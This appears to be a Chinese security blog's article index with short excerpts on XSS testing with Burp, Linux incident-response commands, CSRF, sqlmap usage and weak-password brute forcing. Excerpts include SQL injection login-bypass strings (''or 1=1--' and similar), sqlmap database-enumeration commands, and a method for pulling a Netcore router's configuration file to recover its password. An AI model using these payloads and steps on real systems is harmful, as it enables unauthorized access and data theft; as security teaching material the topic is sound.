
网络安全
<xss_0001234
https://github.com/thatqier
展开
-
短信轰炸黑灰产user_agent
近期朋友的网站短信消耗严重,排查发现接口是被利用作为短信轰炸器。防控方式:可以直接在接口处直接拦截。原创 2023-02-10 00:36:38 · 1282 阅读 · 0 评论 -
xray 扫描器发送结果到钉钉
from flask import Flask, requestimport requestsimport datetimeimport loggingimport jsonapp = Flask(__name__)@app.route('/webhook', methods=['POST'])def xray_webhook(): vuln = request.jso...原创 2019-10-31 14:52:47 · 1022 阅读 · 0 评论 -
burp suite 使用 xssvalidate
配置插件xssValidator使用插件代理功能(目的是抓取真实的http请求报文)配置好浏览器代理地址后发起请求,burp会捕获到请求,点击forward找到对应的请求历史记录,并发送到intruder配置payloads为xssValidator配置options的grep – match对应字符串的出处修改请求参数,并开始xss扫描查看单独的结果(有勾选的就是有xss漏洞的)把对话框出现的u...原创 2018-04-11 12:25:54 · 1897 阅读 · 0 评论 -
linux应急响应事件所需命令
3天内改动过的文件find /路径 -mtime -3 -type f -print找动态脚本并打包find ./ |grep -E ".asp$|.aspx$|.jsp$|.jspx$|.jspf$|.php$|.php3$|.php4$|.php5$|.inc$|.phtml$|.jar$|.war$|.pl$|.py$|.cer$|.asa$|.cdx$|.ashx$|原创 2017-06-28 16:54:06 · 1060 阅读 · 0 评论 -
Android安全之不安全日志输出
漏洞描述:记录敏感信息并进行日志的输出保存漏洞检测方式:对APK进行反编译后,查看是否有log.e语句出现原创 2017-02-23 20:37:20 · 949 阅读 · 0 评论 -
磊科路由破解登入密码的办法
路由器的默认打开地址:http://192.168.1.1/ 不是的话可以C段扫一下下一步输入尝试默认的账号 admin admin 跟guest guest如果都不可以的话,输入地址:192.168.1.1/param.file.tgz将文件下载下来右击打开方式,选择记事本即可,如下图原创 2016-10-13 22:31:28 · 10635 阅读 · 1 评论 -
常见WEB漏洞问题危害及修复建议
漏洞检测工具用语说明一,高危漏洞高危漏洞包括SQL注入漏洞、XSS跨站脚本漏洞、页面存在源代码泄露、网站存在备份文件、网站存在包含SVN信息的文件、网站存在Resin任意文件读取漏洞。SQL注入漏洞:网站程序忽略了对输入字符串中包含的SQL语句的检查,使得包含的SQL语句被数据库误认为是合法的SQL指令而运行,导致数据库中各种敏感数据被盗取、更改或删除。XSS跨站脚原创 2016-10-11 10:42:23 · 6088 阅读 · 0 评论 -
CSRF漏洞的挖掘与利用
0x01 CSRF的攻击原理CSRF 百度上的意思是跨站请求伪造,其实最简单的理解我们可以这么讲,假如一个微博关注用户的一个功能,存在CSRF漏洞,那么此时黑客只需要伪造一个页面让受害者间接或者直接触发,然后这个恶意页面就可以使用受害者的微博权限去关注其他的人微博账户。CSRF只要被批量化利用起来其危害还是比较大的。举个例子,比如笔者在新浪首页执行了一次搜索请求。原创 2016-07-29 14:46:42 · 6502 阅读 · 2 评论 -
sqlmap的注入方式
第一种:普通的注入方式第一步:首先进行 -u操作,比如:-u "http://www.target.com/vuln.php?id=1"第二步:进行-D暴库操作 sqlmap -u "http://www.target.com/vuln.php?id=1" --dbs第三步:进行-T暴表操作 sqlmap -u "http://www.target.com/vuln.php?id=原创 2016-07-08 16:21:12 · 2186 阅读 · 0 评论 -
asp、aspx、php、jsp万能密码大全
-------asp万能密码 'or'='or' --------aspx万能密码 1: "or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6: "or 1=1-- 7:'or'a'='a 8: "or"=原创 2016-07-17 16:16:46 · 19212 阅读 · 1 评论 -
WEB安全之如何挖掘MD5弱口令
0x01 前言 我知道我起这个标题会被很多人鄙视,不就是爆破么?搞得像是谁不会一样。对此,我只想说,那你打我呀!今天会讲的是普通爆破跟使用BURP对MD5加密的密码进行爆破。0x02 什么是弱口令 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅转载 2016-07-14 11:57:09 · 4231 阅读 · 4 评论 -
burpsuite中intruder标签内attack type四种类型的用法和区别
brupsuite中intruder标签是经常使用的,今天我就对attack type四种类型的学习写下笔记第一种:Sniper标签 这个是我们最常用的,Sniper是狙击手的意思。这个模式会使用单一的payload【就是导入字典的payload】组。它会针对每个position中$$位置设置payload。这种攻击类型适合对常见漏洞中的请求参数单独地进行测试。攻击中的请求总数应该是posit原创 2016-07-24 18:13:26 · 17853 阅读 · 0 评论